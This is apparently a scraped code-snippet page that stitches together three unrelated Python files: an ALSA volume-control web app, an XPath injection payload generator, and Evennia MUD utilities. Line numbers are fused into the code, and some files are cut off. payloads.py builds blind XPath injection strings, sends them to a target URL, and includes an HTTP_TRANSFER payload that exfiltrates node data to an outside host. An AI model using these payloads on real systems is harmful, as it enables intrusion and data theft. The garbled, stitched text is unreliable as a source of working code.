Best Python code snippet using hypothesis
tame.py
Source:tame.py  
import time
import threading
import os
import ujson
import traceback
import argparse
import bottle
import alsaaudio
# has issue on the pi
# import soundmeter
# from soundmeter.monitor import Meter
from math import log10

# JSON file holding the per-period limits (MorMin/MorMax, EveMin/EveMax,
# NigMin/NigMax). It is read by the driver thread and by the web handlers.
_CONFIG_PATH = './audio_file.json'

# Runtime state shared between the driver thread and the bottle handlers.
driver_shared_data = {'cycle_time': 3}


def _load_config():
    """Return the parsed config file, first creating it as ``{}`` if missing."""
    if not os.path.exists(_CONFIG_PATH):
        with open(_CONFIG_PATH, 'w') as config_file:
            config_file.write('{}')
    with open(_CONFIG_PATH) as config_file:
        return ujson.load(config_file)


def _period_keys(cur_time):
    """Return the ``(min_key, max_key)`` config keys for a ``time.struct_time``.

    Morning runs from 07:00 through 16:00 inclusive, evening from 16:01
    through 00:00 inclusive, and night covers the remaining hours. The
    original code had two diverging copies of this decision; this helper is
    the single source of truth.
    """
    hour, minute = cur_time.tm_hour, cur_time.tm_min
    if 7 <= hour < 16 or (hour == 16 and minute < 1):
        return 'MorMin', 'MorMax'
    if hour >= 16 or (hour == 0 and minute < 1):
        return 'EveMin', 'EveMax'
    return 'NigMin', 'NigMax'


def _nudge_volume(mixer, current_volume, delta):
    """Move the mixer volume by ``delta`` percent, clamped to 0..100."""
    mixer.setvolume(max(0, min(100, current_volume + delta)))


def _query_json(name, default):
    """Return GET parameter ``name`` (or ``default``) decoded as JSON."""
    return ujson.loads(bottle.request.GET.get(name, default))


def _str_to_bool(text):
    """Parse a command-line boolean such as ``true``/``false``/``1``/``0``."""
    lowered = text.strip().lower()
    if lowered in ('1', 'true', 't', 'yes', 'y', 'on'):
        return True
    if lowered in ('', '0', 'false', 'f', 'no', 'n', 'off'):
        return False
    raise argparse.ArgumentTypeError('expected a boolean, got {!r}'.format(text))


def audio_meter(driver_shared_data):
    """Continuously meter the ambient sound level into ``driver_shared_data['db']``.

    NOTE(review): ``Meter`` comes from the commented-out ``soundmeter`` import
    above, so until that import is restored every iteration fails with a
    NameError. The thread running this function is currently never started.

    :param driver_shared_data: python shared object for runtime data
    :return: never returns
    """
    while True:
        try:
            m = Meter(collect=True, seconds=2)
            m.start()
            m.stop()
            # The divisor evaluates to 1.0; kept as written in the original.
            driver_shared_data['db'] = 20 * log10(m._data['avg'] / (32678.0 - 32677.0))
            print('metered db: {}'.format(driver_shared_data['db']))
        except Exception:
            # Report the failure and back off instead of spinning silently.
            traceback.print_exc()
            time.sleep(1)


def tame_driver(driver_shared_data=None):
    """Adjust the default ALSA mixer so the reported level stays in range.

    Each cycle reads the latest decibel value and preferred range from
    ``driver_shared_data`` and steps the volume by 3 percent when needed.
    While ``driver_shared_data['stop']`` is truthy the loop only sleeps.

    :param driver_shared_data: python shared object for runtime data
    :return: never returns
    """
    if driver_shared_data is None:
        driver_shared_data = {}
    orig_config = _load_config()
    last_update_time = os.path.getmtime(_CONFIG_PATH)
    while True:
        if driver_shared_data.get('stop', False):
            time.sleep(1)
            continue

        min_key, max_key = _period_keys(time.localtime())

        # Reload the limits whenever the config file has been rewritten.
        current_mtime = os.path.getmtime(_CONFIG_PATH)
        config_changed = current_mtime != last_update_time
        if config_changed:
            last_update_time = current_mtime
            orig_config = _load_config()
            print(orig_config)
            print(min_key, max_key)
        else:
            print('the same')
        config_min = int(orig_config.get(min_key, 20))
        config_max = int(orig_config.get(max_key, 50))
        if config_changed:
            driver_shared_data['range'] = config_min, config_max

        default_mixer = alsaaudio.Mixer()
        # print('have data: {}'.format(driver_shared_data))
        # An explicit 'range' in the shared data (set by a config reload or by
        # the REST handlers) takes precedence over the per-period defaults.
        preferred_audio_range = driver_shared_data.get('range', (config_min, config_max, ))
        min_db, max_db = preferred_audio_range
        current_decibel_level = driver_shared_data.get('db', 35)
        current_volume = int(default_mixer.getvolume()[0])
        sweet_spot = driver_shared_data.get(
            'sweet_spot', float(sum(preferred_audio_range)) / len(preferred_audio_range))
        print('current_volume: {}'.format(current_volume))
        print('preferred range: {}'.format(preferred_audio_range))
        try:
            # TODO: reinstitute sweet_spot when ready.
            # if current_decibel_level < sweet_spot and (current_decibel_level >= sweet_spot - 15 and current_decibel_level < preferred_audio_range[1] and preferred_audio_range[1] < preferred_audio_range[0]):
            #     default_mixer.setvolume(current_volume + 3)
            # if current_decibel_level == sweet_spot or current_decibel_level== sweet_spot - 2 or current_decibel_level == sweet_spot + 2:
            #     time.sleep(2)
            #     continue
            if current_decibel_level > max_db:
                print('lowering')
                _nudge_volume(default_mixer, current_volume, -3)
            elif current_decibel_level < min_db:
                # The original compared the mixer volume (a percentage) with
                # min_db here; the range is expressed in decibels.
                print('raising')
                _nudge_volume(default_mixer, current_volume, 3)
            elif (int(current_decibel_level) < int(sweet_spot) - 8) and sweet_spot - 8 > min_db:
                _nudge_volume(default_mixer, current_volume, 3)
            elif (int(current_decibel_level) > int(sweet_spot) + 8) and sweet_spot + 8 < max_db:
                _nudge_volume(default_mixer, current_volume, -3)
        except alsaaudio.ALSAAudioError as e:
            print(e)
        time.sleep(driver_shared_data.get('cycle_time', 3))


@bottle.route('/adjust', method='POST')
@bottle.route('/adjust/', method='POST')
def index():
    """Store the decibel value posted by a client.

    The JSON document is read from the first POST key and must contain a
    ``value`` entry convertible to ``int``.
    """
    audio_data = ujson.loads(list(bottle.request.POST.keys())[0])
    print('Full request: {}'.format(audio_data))
    print('Received REST db: {}'.format(int(audio_data['value'])))
    driver_shared_data['db'] = int(audio_data['value'])


@bottle.route('/adjust/')
@bottle.route('/adjust')
def index_get():
    """Apply the adjustments named in the query string and report the state.

    Every parameter value is decoded as JSON, so flags are passed as
    ``true``/``false``.

    :return: JSON list ``[['cur_db', db], ['range', (min_db, max_db)]]``
    """
    cycle_time = int(_query_json('cycle_time', '-1'))
    if cycle_time > -1:
        driver_shared_data['cycle_time'] = cycle_time

    if _query_json('raise', 'false'):
        driver_shared_data['db'] = driver_shared_data.get('db', 35) + 5
    if _query_json('lower', 'false'):
        driver_shared_data['db'] = driver_shared_data.get('db', 35) - 5

    if _query_json('raise_max', 'false'):
        min_db, max_db = driver_shared_data.get('range', (20, 50, ))
        driver_shared_data['range'] = min_db, max_db + 5
    if _query_json('lower_min', 'false'):
        min_db, max_db = driver_shared_data.get('range', (20, 50, ))
        driver_shared_data['range'] = min_db - 5, max_db

    if _query_json('stop', 'false'):
        driver_shared_data['stop'] = True
        driver_shared_data['start'] = False
    if _query_json('start', 'false'):
        driver_shared_data['stop'] = False
        driver_shared_data['start'] = True
    if _query_json('reset', 'false'):
        driver_shared_data['stop'] = False
        driver_shared_data['start'] = False
        driver_shared_data['range'] = (20, 50)

    if _query_json('too_high', 'false'):
        min_db, max_db = driver_shared_data.get('range', (20, 50, ))
        # Falls back to the current db only when max_db - 5 is exactly 0.
        max_db = (max_db - 5) or driver_shared_data.get('db', 35)
        # if min_db < max_db:
        #     max_db = new_value - 5
        #     min_db = min_db if max_db >= min_db else max_db - 5
        # elif min_db > max_db:
        #     max_db = new_value + 5
        if max_db < min_db:
            min_db = max_db - 5
        driver_shared_data['range'] = min_db, max_db

    if _query_json('too_low', 'false'):
        min_db, max_db = driver_shared_data.get('range', (20, 50, ))
        # Falls back to the current db only when min_db + 5 is exactly 0.
        min_db = (min_db + 5) or driver_shared_data.get('db', 35)
        # if max_db < min_db:
        #     min_db = new_value - 5
        #     max_db = max_db if min_db >= max_db else min_db - 5
        # elif max_db > min_db:
        #     min_db = new_value + 5
        if min_db > max_db:
            max_db = min_db + 5
        driver_shared_data['range'] = min_db, max_db

    # NOTE(review): this flag defaults to 'true', so every GET re-pins the
    # sweet spot unless the caller passes just_right=false -- confirm intent.
    if _query_json('just_right', 'true'):
        driver_shared_data['sweet_spot'] = driver_shared_data.get('db', 35)

    return ujson.dumps([['cur_db', driver_shared_data.get('db', 'NA')],
                        ['range', driver_shared_data.get('range', (20, 50, ))]])


@bottle.route('/static/<filename>')
def server_static(filename):
    """Serve ``filename`` from the current working directory."""
    return bottle.static_file(filename, root='./')


@bottle.route('/hello')
def hello():
    """Render ``firstpg.tpl`` with the configured limits as integers."""
    audio_data = _load_config()
    mor_max = int(audio_data.get('MorMax', 50))
    mor_min = int(audio_data.get('MorMin', 20))
    eve_max = int(audio_data.get('EveMax', 50))
    eve_min = int(audio_data.get('EveMin', 20))
    nig_max = int(audio_data.get('NigMax', 50))
    nig_min = int(audio_data.get('NigMin', 20))
    return bottle.template('./firstpg.tpl', MorMin=mor_min, MorMax=mor_max,
                           EveMin=eve_min, EveMax=eve_max,
                           NigMin=nig_min, NigMax=nig_max)


@bottle.route('/settings', method='GET')
def hello1():
    """Render ``secpg.tpl`` with the configured limits exactly as stored."""
    audio_data = _load_config()
    MorMax = audio_data.get('MorMax', 50)
    MorMin = audio_data.get('MorMin', 20)
    EveMax = audio_data.get('EveMax', 50)
    EveMin = audio_data.get('EveMin', 20)
    NigMax = audio_data.get('NigMax', 50)
    NigMin = audio_data.get('NigMin', 20)
    return bottle.template('./secpg.tpl', MorMin=MorMin, MorMax=MorMax,
                           EveMin=EveMin, EveMax=EveMax,
                           NigMin=NigMin, NigMax=NigMax)


@bottle.route('/updatepg')
def hello2():
    """Persist the limits given in the query string, then redirect to /hello.

    Parameters that are absent or empty keep their stored value instead of
    failing on ``int(None)``.
    """
    audio_data = _load_config()
    for key in ('MorMax', 'MorMin', 'EveMax', 'EveMin', 'NigMax', 'NigMin'):
        value = bottle.request.query.get(key)
        if value:
            audio_data[key] = int(value)
    with open(_CONFIG_PATH, 'w') as config_file:
        ujson.dump(audio_data, config_file)
    bottle.redirect('/hello')


tame_thread = threading.Thread(target=tame_driver, kwargs=dict(driver_shared_data=driver_shared_data))
tame_thread.daemon = True
audio_thread = threading.Thread(target=audio_meter, args=(driver_shared_data, ))
audio_thread.daemon = True
# audio_thread.start()

if __name__ == '__main__':
    ap = argparse.ArgumentParser()
    # type=bool would turn any non-empty string (including "False") into True,
    # so the value is parsed explicitly; a bare --only-meter means True.
    ap.add_argument('--only-meter', type=_str_to_bool, nargs='?', const=True,
                    help='Whether or not we only want to meter the sound -- not provide control',
                    default=False)
    args = ap.parse_args()
    if not args.only_meter:
        tame_thread.start()
    bottle.run(host='0.0.0.0', port=8000)
    # while True:...
payloads.py
Source:payloads.py  
1# Payloads.py2# Makes XPath 1.0 and 2.0 payload strings3from twisted.web.iweb import IBodyProducer4from zope.interface import implements5from twisted.internet.protocol import Protocol6import string7from twisted.web.client import Agent8from twisted.internet import reactor, defer9from twisted.web.http_headers import Headers10import urllib1112class Payload(object):13    def __init__(self, payload, can_lower=False, normalization=False, takes_codepoints=False):14        self.payload = string.Template(payload)1516        self.can_lower = can_lower17        self.normalization = normalization18        self.takes_codepoints = takes_codepoints1920    def replace(self, char, newchar):21        self.payload = string.Template(self.payload.template.replace(char, newchar))22        return self2324    def Create(self, parent):25        output = self.payload26        if parent.config.xversion == "2":27            if self.takes_codepoints:28                output = string.Template(output.safe_substitute(node=parent.PAYLOADS["STRING-TO-CODEPOINTS"].GetString()))29                #print "Output (codepoints): %s"%output.template3031            if parent.config.normalize_unicode and self.normalization:32                output = string.Template(output.safe_substitute(node=parent.PAYLOADS["WRAP_UNICODE"].GetString()))33                #print "Output (norm): %s"%output.template3435            if parent.config.lowercase and self.can_lower:36                output = string.Template(output.safe_substitute(node=parent.PAYLOADS["WRAP_LOWERCASE"].GetString()))37                #print "Output (lower): %s"%output.template3839        return string.Template(parent.BASE.substitute(payload=output.safe_substitute()))4041    def GetString(self):42        return self.payload.template4344    def __repr__(self):45        return str(self)4647    def __str__(self):48        return "<Payload `%s`>"%(self.payload)4950class WrapperPayload(Payload):51    pass525354class PayloadMaker(object):5556    PAYLOADS = 
{57        "DETECT_VERSION"       : Payload("lower-case('A')='a'"),58        "WRAP_LOWERCASE"       : WrapperPayload("lower-case($node)"),59        "WRAP_UNICODE"         : WrapperPayload("normalize-unicode($node)"),60        "STRING-TO-CODEPOINTS" : WrapperPayload("string-to-codepoints($node)"),61        "HTTP_TRANSFER"        : WrapperPayload("boolean(doc(concat('http://$host$port/?id=$id-',encode-for-uri($node))))", can_lower=True, normalization=True),6263        "GET_NODE_CODEPOINT"   : Payload("string-to-codepoints($node)[$index]=$count", can_lower=True, normalization=True),64        "GET_CODEPOINT_LENGTH" : Payload("(string-to-codepoints($node)[$index] > $min and string-to-codepoints($node)[$index] <= $max)", can_lower=True, normalization=True),65        "GET_NODE_SUBSTRING"   : Payload("substring($node,$count,1)='$character'", can_lower=True, normalization=True),6667        "NODEVALUE_LENGTH"     : Payload("string-length($node)=$count", can_lower=True, normalization=True),68        "GET_CONTENT_LENGTH"   : Payload("(string-length($node) > $min and string-length($node) <= $max)", can_lower=True, normalization=True),6970        #"GET_COUNT_LENGTH_STR" : Payload("(count($node) > $min and count($node) <= $max)", can_lower=True, normalization=True),71        "GET_COUNT_LENGTH"     : Payload("(count($node) > $min and count($node) <= $max)"),72        "NODE_COUNT"           : Payload("count($node)=$count"),7374        "GET_COUNT_LENGTH_U"   : Payload("(count($node) > $min and count($node) <= $max)", can_lower=True, normalization=True, takes_codepoints=True),75        "NODE_COUNT_U"         : Payload("count($node)=$count", can_lower=True, normalization=True, takes_codepoints=True),7677        }787980    def __init__(self, config):81        self.config = config82        self.search_space = string.ascii_letters + string.digits + " .-"83        self.agent = Agent(reactor)8485        self._headers = Headers({"User-Agent":[config.user_agent]})8687        if 
config.error_keyword:88            self.BASE = string.Template("' and (if ($payload) then error() else 0) and '1' = '1".replace("'", config.quote_character))89        else:90            self.BASE = string.Template("' and $payload and '1'='1".replace("'", config.quote_character))9192        for payload in self.PAYLOADS:93            self.PAYLOADS[payload] = self.PAYLOADS[payload].replace("'", config.quote_character)949596    def Get(self, name):97        payload = self.PAYLOADS[name.upper()].Create(self)98        return payload.safe_substitute99100    @defer.inlineCallbacks101    def RunQuery(self, payload, errorCount=0):102        if self.config.http_method == "GET":103            URI = "%s?%s"%(self.config.URL,104                           self.config.post_argument + urllib.quote_plus(payload))105        else:106            URI = self.config.URL107108        try:109            response = yield self.agent.request(110                self.config.http_method,111                URI,112                self._headers,113                StringProducer(self.config.post_argument + payload) if self.config.http_method == "POST" else None114            )115116            body_deferred = defer.Deferred()117            response.deliverBody(QuickAndDirtyReceiver(body_deferred))118            content = yield body_deferred119        except Exception:120            if errorCount >= 5:121                raise122            else:123                d = defer.Deferred()124                reactor.callLater(errorCount / 2, d.callback, None)125                yield d126                ret = yield self.RunQuery(payload, errorCount + 1)127                defer.returnValue(ret)128129130        if any([self.config.true_code, self.config.error_code, self.config.fail_code]):131            # Doing it via HTTP status codes132            if self.config.true_code:133                defer.returnValue(self.config.true_code == response.code)134            elif self.config.error_code:135                
defer.returnValue(self.config.error_code == response.code)136            else:137                defer.returnValue(self.config.fail_code == response.code)138        else:139140            if self.config.error_keyword:141                defer.returnValue(self.config.error_keyword in content)142            elif self.config.lookup:143                defer.returnValue(self.config.true_keyword in content)144            else:145                defer.returnValue(self.config.false_keyword in content)146147148    def GetSearchSpace(self):149        return self.search_space150151    def SetSearchSpace(self, space):152        self.search_space = space153154    @defer.inlineCallbacks155    def DetectXPathVersion(self):156        x = yield self.RunQuery(self.Get("DETECT_VERSION")())157        if x:158            self.config.xversion = "2"159            defer.returnValue(2)160        else:161            self.config.xversion = "1"162            defer.returnValue(1)163164class QuickAndDirtyReceiver(Protocol):165    def __init__(self, deferred):166        self.deferred = deferred167        self.buffer = ""168169    def dataReceived(self, data):170        self.buffer+=data171172    def connectionLost(self, reason):173        self.deferred.callback(self.buffer)174175class StringProducer(object):176    implements(IBodyProducer)177178    def __init__(self, body):179        self.body = body180        self.length = len(body)181182    def startProducing(self, consumer):183        consumer.write(self.body)184        return defer.succeed(None)185186    def pauseProducing(self):187        pass188189    def stopProducing(self):
...utils.py
Source:utils.py  
1import uuid2import typing3import random4import string5import yaml6import json7from pathlib import Path8from evennia.utils.ansi import parse_ansi, ANSIString9from rich.ansi import AnsiDecoder10from rich.console import group11from collections import defaultdict12def read_json_file(p: Path):13    return json.loads(open(p, mode='rb').read())14def read_yaml_file(p: Path):15    return yaml.safe_load(open(p, mode="r"))16def read_data_file(p: Path):17    if p.name.lower().endswith(".json"):18        return read_json_file(p)19    elif p.name.lower().endswith(".yaml"):20        return read_yaml_file(p)21    return None22def fresh_uuid4(existing) -> uuid:23    """24    Given a list of UUID4s, generate a new one that's not already used.25    Yes, I know this is silly. UUIDs are meant to be unique by sheer statistic unlikelihood of a conflict.26    I'm just that afraid of collisions.27    """28    existing = set(existing)29    fresh_uuid = uuid.uuid4()30    while fresh_uuid in existing:31        fresh_uuid = uuid.uuid4()32    return fresh_uuid33def partial_match(34    match_text: str, candidates: typing.Iterable[typing.Any], key: callable = str, exact: bool = False) -> typing.Optional[typing.Any]:35    """36    Given a list of candidates and a string to search for, does a case-insensitive partial name search against all37    candidates, preferring exact matches.38    Args:39        match_text (str): The string being searched for.40        candidates (list of obj): A list of any kind of object that key can turn into a string to search.41        key (callable): A callable that must return a string, used to do the search. 
this 'converts' the objects in the42            candidate list to strings.43    Returns:44        Any or None.45    """46    candidate_list = sorted(candidates, key=lambda item: len(key(item)))47    mlow = match_text.lower()48    for candidate in candidate_list:49        can_lower = key(candidate).lower()50        if mlow == can_lower:51            return candidate52        if not exact:53            if can_lower.startswith(mlow):54                return candidate55def generate_name(prefix: str, existing, gen_length: int = 20) -> str:56    def gen():57        return f"{prefix}_{''.join(random.choices(string.ascii_letters + string.digits, k=gen_length))}"58    while (u := gen()) not in existing:59        return u60@group()61def ev_to_rich(s: str):62    if isinstance(s, ANSIString):63        for line in AnsiDecoder().decode(str(s)):64            yield line65    else:66        ev = parse_ansi(s, xterm256=True, mxp=True)67        for line in AnsiDecoder().decode(ev):68            yield line69def echo_action(template: str, actors: dict[str, "DefaultObject"], viewers: typing.Iterable["DefaultObject"], **kwargs):70    for viewer in viewers:71        var_dict = defaultdict(lambda: "!ERR!")72        var_dict.update(kwargs)73        for k, v in actors.items():74            v.get_template_vars(var_dict, k, looker=viewer)75        viewer.msg(text=ev_to_rich(template.format_map(var_dict)))76def iequals(first: str, second: str):...Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You can also refer to the video tutorials on the LambdaTest YouTube channel for step-by-step demonstrations from industry experts.
Get 100 automation test minutes FREE!!
